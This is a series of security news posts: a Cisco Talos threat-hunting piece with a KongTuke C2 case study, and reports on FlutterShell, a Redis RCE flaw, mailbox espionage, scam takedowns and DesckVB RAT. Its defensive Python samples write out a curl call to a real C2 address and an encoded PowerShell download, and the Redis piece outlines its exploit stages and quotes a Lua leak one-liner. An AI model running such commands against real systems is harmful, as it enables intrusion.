Most security tools operate on a simple principle: If a known-bad pattern appears, fire an alert. This works well enough for many threats, but it fails against adversaries who closely study detection thresholds and deliberately stay under them. 

Cisco Talos Threat Hunting operates on a different principle. Instead of waiting until we’re sure we can cross an alerting threshold, we start with a hypothesis about what specific adversary behavior would look like in the telemetry, and then search for it. Using both AI and human-driven processes, including pioneering hunts built from Talos’ latest threat research, we continuously search for threats that traditional detection misses.

These hunts operate at the leading edge of our intelligence, where patterns are compelling but require expert judgment to distinguish from benign activity. Talos threat analysts provide this judgement to ensure maximum fidelity for your threat landscape. 

This post covers how that works in practice.

Hypothesis-driven hunting vs. alert-driven detection 

A detection rule says, "If X happens, alert." A hunt hypothesis says, "Given this specific threat actor uses these specific techniques, what would those techniques look like in this specific telemetry source?" 

The distinction matters because it inverts the workflow. Detection requires prior knowledge encoded into a rule. Hunting requires only a plausible theory about adversary behavior and the telemetry to test it against. 

Our hypotheses come from multiple sources: active threat intelligence on adversary tradecraft, findings from Cisco Talos Incident Response engagements, and patterns observed across global telemetry from nearly 50 million sensors. When Talos sees a new technique in the wild, we can build a hunt for it before a detection signature exists.

Here are a few examples of these threat hunts:

  • Python User-Agent connections to malicious ASN infrastructure. Legitimate Python HTTP requests exist in most environments, but Python calling out to hosting providers with poor reputation scores is a different signal entirely. 
  • MSIEXEC User-Agent making connections to suspicious or malicious ASNs. MSIEXEC fetching remote packages is a known living-off-the-land (LOTL) technique. The user-agent string persists in firewall connection logs even when the payload itself is encrypted. 
  • Domain generation algorithm (DGA) detection via AI/ML. Algorithmically generated domains have statistical properties (character distribution, entropy, n-gram frequency) that distinguish them from human-registered domains. Our models flag DNS queries that match these patterns. 
  • Connections to EVILEMPIRE ASN ranges. Certain autonomous systems have a long, documented history of hosting command-and-control (C2) infrastructure. Outbound connections to these ranges warrant investigation regardless of the specific destination IP. 
  • User-Agent and application outliers. Baseline what's normal for an environment, then surface what deviates. A curl binary running on a finance team's workstation at 2am is not the same signal as curl running in a CI/CD pipeline. 
  • Endpoint detection and response (EDR) research findings correlated with network indicators of compromise (IOCs). When endpoint telemetry reveals a new threat, the associated network indicators become hunt targets across firewall data for all customers.

Each of these hunts runs continuously. The AI engine executes them at scale, 24 hours a day, across all enrolled customer environments. It surfaces candidates. Then a human analyst investigates.

Case study: KongTuke C2 discovery through multi-domain correlation 

The value of correlating telemetry across security domains is easiest to explain with a real example. During a recent engagement with a customer, Talos analysts identified active KongTuke C2 activity by combining firewall and endpoint data in a way that neither source could have accomplished alone. This is the kind of continual awareness we are seeking to bring to customers everywhere with Talos Threat Hunting.

What the firewall showed 

Cisco Secure Firewall telemetry recorded outbound ConnectionEvents to “144.31.221.82” on port 6060, with a URL path of /capcha9856. This pattern is consistent with a Traffic Direction System (TDS) infection, where a compromised website redirects visitors through a chain of intermediate servers before landing on a malicious payload host. 

The firewall gave us the "what" and "when" — a specific device was reaching out to known-bad infrastructure at a known time. But the firewall alone could not tell us how the connection was initiated or what happened next on the host.

What EDR added 

Pivoting to Cisco Secure Endpoint data for the same DeviceIP, we pulled the full process history around the time of the connection. The endpoint telemetry revealed:

  1. cmd.exe process spawning powershell.exe with an -EncodedCommand parameter containing a Base64-encoded payload 
  2. The decoded payload executing Invoke-WebRequest to fetch a file named script.ps1, dropping it into the user's ApplicationData directory 
  3. A separate curl.exe process making requests to the same C2 infrastructure the firewall had flagged 
  4. Post-execution cleanup via Remove-Item, attempting to delete traces of the downloaded script

Why neither source alone was sufficient 

The firewall saw an outbound connection to a suspicious IP. That's useful, but not conclusive on its own. Hundreds of legitimate services might generate similar connection patterns. The EDR saw obfuscated PowerShell execution. That's suspicious, but without the network context confirming the destination was a known C2 server, it could be a false positive from an overzealous admin script. 

Together, they told a complete story: initial compromise via TDS redirect, payload delivery through encoded PowerShell, C2 communication confirmed by both endpoint process tree and network connection logs, and active evidence of anti-forensics (file cleanup). This is a confirmed intrusion with clear remediation steps, not an ambiguous alert requiring hours of analyst triage. 
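
The correlation described in this case study, as an added example (not Talos code): it joins firewall connection events to endpoint process events by device IP and time window, and decodes -EncodedCommand arguments as UTF-16LE Base64. The event field names, device IPs, timestamps and the example.invalid / intranet.example URLs are constructed; only the C2 address, port and URL path come from the case study.

```python
import base64
from datetime import datetime, timedelta

# Network indicator reported in the case study.
C2_IP, C2_PORT = "144.31.221.82", 6060


def decode_encoded_command(cmdline):
    """Return the decoded script of a PowerShell -EncodedCommand argument, or None.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...)
    plus the -ec alias; the payload is Base64 over UTF-16LE text.
    """
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag.lstrip("-/").lower()
        if flag[:1] in "-/" and name and ("encodedcommand".startswith(name) or name == "ec"):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except ValueError:  # bad Base64 or bad UTF-16
                return None
    return None


def classify(ev):
    """Label one endpoint event with the behaviour it shows, or None."""
    proc, cmd = ev["process"].lower(), ev["cmdline"]
    if proc == "powershell.exe":
        decoded = decode_encoded_command(cmd)
        if decoded and "invoke-webrequest" in decoded.lower():
            return "encoded_download"
        if "remove-item" in cmd.lower():
            return "cleanup"
    if proc == "curl.exe" and C2_IP in cmd:
        return "curl_to_c2"
    return None


def correlate(fw_events, edr_events, window=timedelta(minutes=5)):
    """Per device: did the firewall, the endpoint, or both see the activity?"""
    fw_hits = [f for f in fw_events if (f["dst_ip"], f["dst_port"]) == (C2_IP, C2_PORT)]
    result = {f["device_ip"]: {"network": True, "endpoint": []} for f in fw_hits}
    for ev in edr_events:
        kind = classify(ev)
        if kind is None:
            continue
        entry = result.setdefault(ev["device_ip"], {"network": False, "endpoint": []})
        in_window = any(f["device_ip"] == ev["device_ip"]
                        and abs(f["ts"] - ev["ts"]) <= window for f in fw_hits)
        # With a firewall hit, keep only endpoint events close to it in time.
        if in_window or not entry["network"]:
            entry["endpoint"].append(kind)
    for entry in result.values():
        if entry["network"] and entry["endpoint"]:
            entry["verdict"] = "corroborated"
        elif entry["network"]:
            entry["verdict"] = "network_only"
        else:
            entry["verdict"] = "endpoint_only"
    return result


def _enc(script):
    """Build a constructed -EncodedCommand value for the sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample telemetry (field names are assumptions, not a product schema).
T0 = datetime(2026, 1, 1, 2, 0, 0)
FIREWALL = [
    {"ts": T0, "device_ip": "10.0.0.5", "dst_ip": C2_IP, "dst_port": 6060, "url_path": "/capcha9856"},
    {"ts": T0, "device_ip": "10.0.0.9", "dst_ip": C2_IP, "dst_port": 6060, "url_path": "/capcha9856"},
]
ENDPOINT = [
    {"ts": T0 + timedelta(seconds=20), "device_ip": "10.0.0.5", "parent": "cmd.exe",
     "process": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand " + _enc(
         "Invoke-WebRequest -Uri http://example.invalid/script.ps1 -OutFile $env:APPDATA\\script.ps1")},
    {"ts": T0 + timedelta(seconds=40), "device_ip": "10.0.0.5", "parent": "cmd.exe",
     "process": "curl.exe", "cmdline": "curl.exe -s 144.31.221.82:6060/capcha9856"},
    {"ts": T0 + timedelta(seconds=90), "device_ip": "10.0.0.5", "parent": "cmd.exe",
     "process": "powershell.exe", "cmdline": "powershell.exe Remove-Item $env:APPDATA\\script.ps1"},
    # Admin script on another host: encoded download, but no contact with the C2.
    {"ts": T0, "device_ip": "10.0.0.7", "parent": "cmd.exe", "process": "powershell.exe",
     "cmdline": "powershell.exe -enc " + _enc(
         "Invoke-WebRequest -Uri https://intranet.example/tools.zip -OutFile tools.zip")},
]

if __name__ == "__main__":
    for ip, entry in sorted(correlate(FIREWALL, ENDPOINT).items()):
        print(ip, entry["verdict"], entry["endpoint"])
```

Only 10.0.0.5 comes out as corroborated; the other two hosts are the single-source cases the section describes and still need an analyst's judgment.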

Broader sweep 

Once we had the process hashes and file paths from EDR, we searched across the full customer environment for other hosts exhibiting the same behavior. This turned a single finding into a scoped understanding of how far the compromise had spread.

How AI and human analysts divide the work 

Talos Threat Hunting runs on a hybrid model where each component does what it's best at. 

The AI engine handles volume and persistence. It executes hundreds of hunt hypotheses continuously across all customer environments. It applies statistical models (DGA detection, behavioral baselining, anomaly scoring) to telemetry streams at a scale no analyst team could match. Its job is to reduce the search space by taking the full volume of telemetry and surfacing the subset that warrants human attention. 

Human analysts handle context and judgment. A statistical anomaly is not the same as a confirmed threat. Analysts validate findings by correlating across data sources, applying knowledge of the customer's environment, and making determinations that require understanding adversary intent. When an analyst confirms a finding, the customer receives a written notification explaining what was observed, why it matters, how it maps to known techniques (MITRE ATT&CK or equivalent), and specific remediation guidance. 

This is not "AI finds threats and humans approve them." The AI surfaces candidates from a space too large for humans to search manually. Humans then do investigative work that AI cannot always reliably perform: understanding whether a particular behavior is malicious or benign given the full operational context of that specific environment.

The feedback loop: Hunting improves detection 

Every confirmed finding is first reported to the customer, then evaluated for a second question: “Should this have been caught by automated detection?” 

If the answer is yes, that means a detection gap exists. Maybe a rule needs tuning, a sensor configuration needs adjustment, or the customer's policy allows something that creates unnecessary exposure. In each case, the finding feeds back into product improvement or customer-specific configuration recommendations.

This creates a cycle: Intelligence drives hypotheses, hypotheses drive hunts, hunts produce findings, findings improve detection, and better detection raises the bar for what qualifies as "between the alerts." The space we hunt in gets harder to exploit over time. 

What this means for your security team 

If you have a mature SOC, this covers the ground your team is not currently reaching. These hypotheses are built from global threat intelligence, executed continuously, across telemetry your analysts may not have time to proactively search. The findings are validated before they reach you, so they add signal without adding noise. 

If you are running a lean security operation, this provides a hunting capability that would otherwise require dedicated headcount, specialized tooling, and the institutional knowledge to know what "normal" looks like well enough to spot deviations. 

Either way, the output is not more alerts. It's written findings with context, mapped to adversary techniques, with clear next steps that you can act on directly. To learn more, contact your Cisco account team and explore what’s possible with Cisco Talos.  

Some products or features described may be in various stages of development and offered on a when-and-if available basis. Cisco reserves the right to change delivery timelines and will have no liability for any delays or failures to deliver.  



from Cisco Talos Blog https://ift.tt/XhyNnip
via IFTTT

FlutterShell Backdoor Spreads to macOS via Malicious Google and YouTube Ads

Cybersecurity researchers have shed light on a macOS malvertising campaign codenamed Operation FlutterBridge that spreads a new backdoor called FlutterShell.

According to Palo Alto Networks Unit 42, the campaign is said to be the next stage of an activity cluster dubbed JSCoreRunner (aka FileRipple) that was reported in late August 2025. The cybercrime group behind the two attack chains is being tracked under the moniker CL-CRI-1089. The attackers are assessed to have been active since at least 2023.

"Built using the Flutter framework, FlutterShell infects targets with adware via malicious desktop applications," Unit 42 said. "In addition to its adware functionality, the payload possesses backdoor capabilities, including shell command execution and file system manipulation."

Operations attributed to CL-CRI-1089 also include Recipe Lister and Calendaromatic, both of which fall under a broader designation known as TamperedChef (aka EvilAI), an ongoing series of campaigns that involve using trojanized versions of productivity software to deliver potentially unwanted programs (PUPs) and adware.

These campaigns distribute malicious Google and YouTube advertisements using a network of Google-verified shell companies, with the ads acting as a lure to trick targets into deploying malware that masquerades as legitimate desktop applications. Some of the front companies are AdsParkPro LTD, Advantage Web Marketing LLC, and SOFT WE ART LIMITED (now PACIFIC TRADE SOLUTIONS LTD).

Target audiences for these ads are macOS users in the U.S., Canada, Australia, France, and Germany. Although none of the Google Ads accounts are currently accessible via the Google Ads Transparency Center, records from YouControl and the U.K. government's Companies House register indicate that the firms all have links to Ukrainian individuals.

The latest iteration entails the deployment of FlutterShell, which supports arbitrary command execution, file system interaction, and environment variables exfiltration. These efforts have been detected as recently as March 2026.

"Upon execution, the malware modifies Google Chrome configuration files to hijack the browser, forcing all traffic through an attacker-controlled, ad-filled intermediary site," researchers Ido Asher, Noa Dekel, and Tom Fakterman said. "All observed samples were signed with valid Apple Developer IDs and successfully passed notarization, meaning Apple's automated security checks did not flag them as malicious at the time of submission."

What makes FlutterShell noteworthy is that it implements a WebView-based architecture that utilizes a JavaScript-to-native bridge, thereby allowing the adversary to host malicious logic on an external website, rather than embedding it into the binary. This, in turn, makes it possible to dynamically alter the malware's behavior in real time without having to recompile or push out an updated version to compromised hosts.

"In WebView-based architecture, a native application uses an embedded web browser component to display content," Unit 42 explained. "The JavaScript-to-native bridge acts as a communication channel between this web content and the host native application, allowing them to exchange data and cross-invoke functionality."

Three different variants of FlutterShell, viz., PodcastsLounge, PDF-Brain, and PDF-Ninja, have been identified. This, coupled with the presence of unfinished functions in the JavaScript logic hosted on the attackers' infrastructure, suggests the malware is likely under active development.

Some of the variants, PDF-Brain and PDF-Ninja, feature an artificial intelligence (AI)-powered summarization capability by relaying documents through an attacker-controlled server before processing them. FlutterShell also enables system fingerprinting and the theft of browser session data.

FlutterShell has also been found to share technical similarities with Calendaromatic and Recipe Lister, the most obvious being the WebView-based code architecture to facilitate dynamic payload changes. What's more, Advantage Web Marketing LLC has been observed not only spreading malicious ads but also acting as the signatory for Windows adware variants associated with the cluster.

"The evolution from JSCoreRunner to FlutterShell represents a significant increase in technical depth for the attackers behind CL-CRI-1089," Unit 42 said. "Furthermore, the scale of the distribution network, coupled with the verified shell entities used to bypass ad-network vetting, highlights the persistent danger of malvertising. The coordination of multiple shell entities, and the rapid development and delivery of new FlutterShell variants, indicates that this campaign is far from over."



from The Hacker News https://ift.tt/IMQnCNH
via IFTTT

Autonomous AI Tool Finds 2-Year-Old RCE Flaw in Redis (CVE-2026-23479)

Redis has patched a use-after-free in its blocking-client code that lets an authenticated user run arbitrary OS commands on the machine hosting the database. The flaw was found by an autonomous AI tool built to hunt bugs in large codebases.

Tracked as CVE-2026-23479, the flaw was introduced in Redis 7.2.0 and remained in every stable branch until the May 5 fixes, unnoticed for over two years. NVD rates it 8.8 under CVSS 3.1; Redis lists it as 7.7 under CVSS 4.0. It was reported by Team Xint Code, and a complete technical write-up is now public.

The cloud footprint makes this worse. Wiz's analysis, published with the exploit writeup, puts Redis in a large majority of cloud environments, with most of those instances running without a password. The exploit needs an authenticated session, but in a default deployment, the default user already holds every privilege the chain requires.

The flaw lives in unblockClientOnKey() in src/blocked.c, which fires when a key event wakes a blocked command. The function dispatches the queued command through processCommandAndResetClient(), then keeps using the same client pointer. The problem: that function can free the client as a side effect, and its own header comment says so. The caller ignores the return value and reads the freed structure anyway, a use-after-free (CWE-416).

Per Wiz's analysis, the bug took two commits to create. A January 2023 refactor (PR #11012) added the unchecked call. A March 2023 change (PR #11568) added more client access after it. Neither was dangerous alone. Together, they reached general availability in 7.2.0 and survived multiple rounds of security review.

The chain starts by leaking a heap address. From there it frees a client and slips a fake one into the same memory, then turns Redis's own memory accounting against itself to overwrite a function pointer.

The published version runs in three stages.

  • First, a one-line Lua script (EVAL "return tostring(redis.call)" 0) leaks a heap pointer.
  • Second, the attacker grooms client memory limits, parks a bloated client on a stream, then drops the limits and wakes it. Redis frees the blocked client mid-call, and a pipelined SET immediately reclaims the freed slot with a fake client structure.
  • Third, Redis's routine memory accounting in updateClientMemoryUsage() performs an out-of-bounds decrement using attacker-controlled fields, aimed at the Global Offset Table to repoint strcasecmp() at system(). The next command Redis parses runs as a shell command.

The official Redis Docker image makes the last step easier. It ships with only partial RELRO, leaving the GOT writable at runtime. ASLR and PIE do not help here, since the write is relative to a global whose offset is fixed at build time.

The full chain needs an authenticated session with CONFIG SET, EVAL, stream commands (XREAD/XADD), and basic SET/GET, which maps to the @admin, @scripting, @stream, and @read/@write ACL categories.

The default user has all of them, and in most deployments, these privileges are grouped into a single shared application or operator role. Denying CONFIG outright breaks this specific chain, though not the underlying use-after-free.

Team Xint Code demonstrated the working RCE at ZeroDay.Cloud 2025, Wiz's hacking competition in London last December. Theori describes Xint Code as an autonomous AI security tool built to hunt bugs in large codebases.

Redis said it had no evidence of exploitation in its own or customer environments, and as of publication no public in-the-wild reports have surfaced. The full technical chain is now public, increasing the risk of follow-on exploitation.

Upgrade to the patched minor for your series: 7.2.14, 7.4.9, 8.2.6, 8.4.3, or 8.6.3, all released on May 5. Minor upgrades within a series are meant to be drop-in. Managed Redis services patch on their own schedules, and Redis says Redis Cloud is already done.

Branch   Affected           Fixed
7.2.x    7.2.0 to 7.2.13    7.2.14
7.4.x    7.4.0 to 7.4.8     7.4.9
8.2.x    8.2.0 to 8.2.5     8.2.6
8.4.x    8.4.0 to 8.4.2     8.4.3
8.6.x    8.6.0 to 8.6.2     8.6.3

If you cannot patch yet: keep Redis off the public internet and behind TLS, tighten ACLs so no single role holds @admin, CONFIG, and @scripting together, and deny @scripting if you do not use Lua, which kills the Stage 1 leak.

Prioritize internet-exposed instances, shared application credentials, and any role that combines CONFIG, scripting, and stream access. Rotate any broadly shared Redis credentials while you are at it.
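
A pre-patch audit for the advice in this article, as an added example (not Redis or Wiz code): it classifies a redis_version string against the fixed releases listed here and evaluates ACL LIST lines to find users who hold every command the published chain needs. The ACL evaluator is a simplification that ignores selectors and key patterns, the command-to-category map is an assumption to confirm with ACL CAT on your build, and the sample users are constructed.

```python
import re

# Fixed patch level per release series, as listed in this article.
FIXED = {(7, 2): 14, (7, 4): 9, (8, 2): 6, (8, 4): 3, (8, 6): 3}

# Commands the published chain needs, with their ACL categories.
# Assumption: category membership should be confirmed with ACL CAT on your build.
CHAIN = {
    "config|set": {"admin", "slow", "dangerous"},
    "eval": {"scripting", "slow"},
    "xread": {"stream", "read", "slow", "blocking"},
    "xadd": {"stream", "write", "fast"},
    "set": {"write", "string", "slow"},
    "get": {"read", "string", "fast"},
}


def version_status(redis_version):
    """Classify the redis_version field of INFO server for CVE-2026-23479."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)", redis_version.strip())
    if not m:
        return "unparsed"
    major, minor, patch = map(int, m.groups())
    if (major, minor) < (7, 2):
        return "predates-bug"  # the flaw was introduced in 7.2.0
    fixed = FIXED.get((major, minor))
    if fixed is None:
        return "series-not-listed"  # check the vendor advisory for this series
    return "fixed" if patch >= fixed else "affected"


def allowed_commands(rules):
    """Apply ACL command rules left to right; return the chain commands still allowed."""
    allowed = set()
    for tok in rules:
        t = tok.lower()
        if t in ("+@all", "allcommands"):
            allowed = set(CHAIN)
        elif t in ("-@all", "nocommands"):
            allowed = set()
        elif t[:2] in ("+@", "-@"):
            hit = {c for c, cats in CHAIN.items() if t[2:] in cats}
            allowed = allowed | hit if t[0] == "+" else allowed - hit
        elif t[:1] in ("+", "-") and len(t) > 1:
            name = t[1:]  # "config" covers every subcommand, "config|set" only one
            hit = {c for c in CHAIN if c == name or c.split("|")[0] == name}
            allowed = allowed | hit if t[0] == "+" else allowed - hit
    return allowed


def audit_acl(acl_list_lines):
    """Report, per user in ACL LIST output, which chain commands are missing."""
    findings = []
    for line in acl_list_lines:
        parts = line.split()
        if len(parts) < 2 or parts[0] != "user":
            continue
        name, rules = parts[1], parts[2:]
        missing = sorted(set(CHAIN) - allowed_commands(rules))
        enabled = "on" in rules
        findings.append({
            "user": name,
            "nopass": "nopass" in rules,
            "missing": missing,
            # True when one enabled identity can run every command the chain needs.
            "full_chain": enabled and not missing,
        })
    return findings


# Constructed ACL LIST output; the "#..." tokens stand in for password hashes.
SAMPLE_ACL = [
    "user default on nopass sanitize-payload ~* &* +@all",
    "user app on #constructed-hash ~app:* resetchannels -@all +@read +@write +@stream",
    "user ops on #constructed-hash ~* &* +@all -@scripting",
    "user worker on #constructed-hash ~* &* +@all -config",
]

if __name__ == "__main__":
    print("7.2.13:", version_status("7.2.13"))
    for f in audit_acl(SAMPLE_ACL):
        print(f)
```

A user with an empty "missing" list is the role to split first; per the article, removing CONFIG or scripting breaks this specific chain but not the underlying use-after-free, so the version check still decides whether the host needs the upgrade.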

CVE-2026-23479 was one of five RCE-class Redis flaws disclosed last month, and it follows Redis's 2025 RediShell flaw, another authenticated use-after-free involving Lua scripting. It is also the one an AI tool caught. Two commits planted it, two years hid it, and it sat in one of the most-deployed databases around until a hacking contest surfaced it. Code review never did.



from The Hacker News https://ift.tt/Vu8MnJj
via IFTTT

Hackers Spied on a Stock Exchange Executive's Outlook Mailbox for Five Months

Unknown attackers spent at least five months inside the Outlook mailbox of a senior executive at a major global stock exchange, copying the inbox out in small, repeated batches and routing it through Dropbox and OneDrive so the traffic blended into normal cloud activity.

Symantec and Carbon Black's Threat Hunter Team reported the campaign this week. This points to espionage, not a money grab: Symantec said the commands indicate intelligence collection, not theft for profit.

Neither the executive nor the exchange was named. The value is plain enough: an exchange executive's inbox can hold non-public listing details, enforcement matters, deal terms, market-moving plans, plus the executive's calendar and contacts.

Five months of quiet access handed the attacker a detailed read on the executive's dealings and where the organization was heading, without needing broad access to other business systems.

The first malicious activity showed up on October 10, 2025. By then, the attacker was already running two binaries as SYSTEM, the highest Windows privilege level, one faking Adobe's updater and the other faking OneDrive. By the time defenders noticed anything, the intruder had full control of the machine, and how they first got in is still unknown.

However, Symantec confirmed that the first signs likely came from lateral movement off a previously compromised device. The operation kicked into gear on November 12. The attacker pulled a Dropbox API token, started uploading data with curl, and deployed the main tool: a mailbox stealer built on Aspose, a legitimate .NET library that reads Outlook OST and PST files. Wrapped in an executable, it converted the mailbox to PST and wrote it to disk, run each time with a password and a date-range flag.

The first run grabbed everything from August 2025 on. After that the attacker came back every two to four weeks, each run taking only the days since the last one, eight more pulls through February 17, 2026. The result is a near-continuous copy of the mailbox, sliced thin enough not to draw attention from security software.

The stealth came from making the work look ordinary. Scheduled tasks posed as Adobe, Lenovo and OneDrive system services. For exfiltration the attacker used Dropbox and OneDrive Personal, and for OneDrive they connected to hard-coded Microsoft IP addresses instead of the onedrive.live.com hostname, so there were no DNS lookups for a perimeter tool to catch or block.

The attacker also tested the public file host temp.sh once in November, then dropped it. The last observed activity, on March 19, 2026, was a new backdoor that was staged but never run, which Elias said may mean the attacker lost access soon after.

Symantec's published indicators point to a wider intrusion kit, not just a mailbox grabber: FRPC for tunneling traffic out, Secretsdump for pulling Windows credentials, SharpDecryptPwd for recovering saved app passwords, and a tool to bypass Windows User Account Control. The report does not say how each was used here, and none of them point to a specific group.

There is no CVE in this story. It was an intrusion against a person's mailbox, not the exploitation of a freshly disclosed flaw, which is part of why it is worth reading: no patch closes this, and the burden shifts to monitoring and response.

Attribution is unresolved too. The mix of public tooling and consumer cloud services left little to tie the activity to a known actor, and that stays open until a stronger source says otherwise. Routing exfiltration through Dropbox and OneDrive to blend in is a well-worn play, and one Microsoft has flagged as a deliberate way to slip past perimeter defenses and muddy attribution.

If you defend an exchange, a regulator, or any firm sitting on market-moving information, feed the hashes in now and watch for the behavior behind them: unusual mailbox export activity, odd Outlook access, uploads to personal Dropbox or OneDrive accounts, unexpected tunneling, and credential-dumping on systems tied to privileged users.



from The Hacker News https://ift.tt/1ZXAMoR

DoJ Disrupts Southeast Asia Crypto Fraud Networks, Freezes $3.8 Million in Assets

The U.S. Department of Justice (DoJ) on Wednesday announced the results of a sweeping action undertaken by government authorities and private sector companies to combat cyber-enabled and cryptocurrency fraud targeting Americans.

The "Disruption Week" operation began May 18, 2026, leading to the takedown of millions of social media, email, and internet access accounts used by transnational cybercrime groups in Southeast Asia to defraud victims. Private sector entities voluntarily froze over $3.8 million in cryptocurrency involved in the laundering of funds stolen from Americans.

"Cyber-enabled and crypto investment fraud is devastating Main Street Americans, wiping out life savings and preying on some of our most vulnerable citizens," said U.S. Attorney Jeanine Ferris Pirro for the District of Columbia.

The efforts are part of an ongoing U.S. government initiative called Scam Center Strike Force, which aims to dismantle transnational criminal organizations running cyber-enabled fraud and "pig butchering" (aka romance baiting) scams from compounds in Southeast Asia, along with the human trafficking and money laundering operations that fuel the illicit enterprise.

These schemes typically involve cultivating relationships with prospective victims over time before they are coaxed into depositing funds into fraudulent investment platforms under the promise of high returns. Once the assets are deposited, they are routed to accounts under the scammers' control. Once the victim runs out of money or discovers the fraud, the criminals cease contact with them.

Participating in the operation were Apple, Coinbase, Google, Meta, Microsoft, Silent Push, SpaceX/Starlink, TRM Labs, and Zenlayer, alongside the Australian Federal Police, Canadian Anti-Fraud Centre, New Zealand Police, the Royal Thai Police, and U.K. National Crime Agency.

The "first-of-its-kind event" has resulted in a series of actions:

  • Disruptions of criminal activity across more than 1.4 million accounts, pages and groups across Facebook and Instagram, 20,000 Microsoft accounts, and thousands of Starlink kits;
  • Interruptions of malicious IP address traffic and of network connections hosted by scammers;
  • Decommissioning of servers, colocation environments, and hosting infrastructure linked to scam networks operating across Southeast Asia;
  • Identification of multiple scammers and scam platforms, and referrals of the same to U.S. authorities for investigation and possible prosecution; and
  • Arrests of seven scammers in Thailand and the opening of new cases by the Royal Thai Police Anti-Cyber Scam Center.

According to the DoJ, cryptocurrency investment scams have emerged as one of the "fastest growing and most financially devastating forms of fraud" targeting Americans, with reported losses from these scams rising from $3.96 billion in 2023 to $5.8 billion in 2024 and to more than $7.2 billion in 2025, registering a 24% increase year-over-year.

"Many of these schemes are run out of industrial-scale compounds in Cambodia, Laos, and in Burma along the border with Thailand," the DoJ said. "Criminal syndicates often lure workers to Thailand with promises of high-paying technical jobs, then seize their identification documents and traffic them to work in scam compounds."

"Within the compounds, trafficked workers are frequently forced to conduct fraud operations against victims in the United States and elsewhere under threat of violence."

Last month, a joint international operation involving U.S. and Chinese authorities arrested at least 276 suspects and shut down nine scam centers used for cryptocurrency investment fraud schemes targeting Americans.

In a coordinated statement, Meta said law enforcement has arrested 63 potential criminals connected to scam centers thus far, with Coinbase freezing over $3 million in cryptocurrency assets tied to criminal networks.

"Transnational online fraud cannot be solved by any single agency or country acting alone, which is why strong collaboration and timely information sharing remain essential to dismantling these networks and protecting the public," Police Lieutenant General Jirabhop Bhuridej, Royal Thai Police, said.



from The Hacker News https://ift.tt/32uGIHx

Wednesday, June 3, 2026

Google DoubleClick Abused in New Malspam Campaign to Deliver DesckVB RAT

Cybersecurity researchers have flagged a new malspam campaign that makes use of Google's DoubleClick domain as a way to evade detection and ultimately deliver a remote access trojan (RAT) named DesckVB RAT.

"Before the victim ever reaches attacker-controlled infrastructure, the lure routes through DoubleClick, a legitimate Google-owned domain that many security tools are less likely to treat as suspicious," Huntress researchers Anna Pham and Adam Mooney said in a report shared with The Hacker News.

"From there, the victim is passed into a malspam kit that personalizes itself on the fly using the victim's email address, dynamically pulling in company branding and location details to make the page feel convincing without requiring the operators to handcraft a lure for each target."

What makes this attack noteworthy is that it eliminates the need for having a bespoke kit for each targeted organization, thereby making these operations more scalable and cost-effective. The end goal of the campaign is to drop DesckVB RAT, a .NET-based trojan that has been active in the wild since February 2026.

The attack begins when an unsuspecting user opens an HTML file that's attached to a phishing email. The file triggers a meta-refresh browser redirect to a Google DoubleClick Campaign Manager click-tracking URL, from where the user is steered to another redirector, which decodes the Base64-encoded email address and leads the victim to a landing page containing a "Download PDF" button.
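A mail-gateway check for the first stage described above, added here as an example (not Huntress's code): it pulls meta-refresh targets out of an HTML attachment, notes whether the first hop is a doubleclick.net host, and decodes Base64 tokens that turn out to be e-mail addresses. The sample attachment, click path, redirector host and recipient are constructed placeholders.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
TOKEN_RE = re.compile(r"[A-Za-z0-9_+-]{12,}={0,2}")  # Base64-looking runs in a URL

class MetaRefreshFinder(HTMLParser):
    """Collect the target URL of every <meta http-equiv="refresh"> tag."""
    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.I)
            if m:
                self.targets.append(m.group(1).strip())

def b64_email(token):
    """Return the decoded address if token is Base64 of an e-mail address, else None."""
    try:
        raw = base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))
        text = raw.decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if EMAIL_RE.match(text) else None

def analyze_attachment(html):
    """Report each meta-refresh target, whether it is a DoubleClick host, and embedded e-mails."""
    finder = MetaRefreshFinder()
    finder.feed(html)
    report = []
    for url in finder.targets:
        host = (urlsplit(url).hostname or "").lower()
        emails = [e for e in map(b64_email, TOKEN_RE.findall(unquote(url))) if e]
        tracker = host == "doubleclick.net" or host.endswith(".doubleclick.net")
        report.append({"url": url, "doubleclick": tracker, "emails": emails})
    return report

def constructed_sample():
    """Constructed attachment: placeholder click path, hypothetical redirector and recipient."""
    token = base64.b64encode(b"alice@example.com").decode()
    url = "https://ad.doubleclick.net/PLACEHOLDER?dest=https://redirector.example/r%23" + token
    return f'<html><head><meta http-equiv="Refresh" content="0; url={url}"></head></html>'
```

An attachment whose only content is an instant refresh through an ad click tracker, carrying the recipient's own address in encoded form, is a strong quarantine signal even though the first-hop domain is reputable.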

Clicking the button causes the server to respond with a ZIP archive that initiates the rest of the infection chain. This is achieved by means of a JavaScript loader, whose main responsibility is to retrieve and execute a .NET RAT while flying under the radar. The script extracts and runs a PowerShell script, which then fetches a .NET loader from an external server.

The loader acts as a stager that verifies it's not being analyzed, neutralizes the machine's security controls, sets up persistence, and then ultimately downloads and runs the RAT payload by using a technique called process hollowing that involves injecting the malware into Microsoft-signed processes.

Once launched, the trojan communicates with a command-and-control (C2) server over raw TCP sockets, carries out system reconnaissance, and configures Microsoft Defender exclusions. At the outset, it also patches the Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) at the native API level to blind Windows telemetry. Only then does it establish persistence on the host by setting up Run and RunOnce Registry entries and placing a loader responsible for launching the RAT in the user's Startup folder.

The malware can extract data, run commands, and deploy additional payloads, granting the attackers full control over infected machines. It also tries to stay under the radar by terminating and rebooting the machine if it detects an analysis tool or determines that it is running in a sandboxed environment.

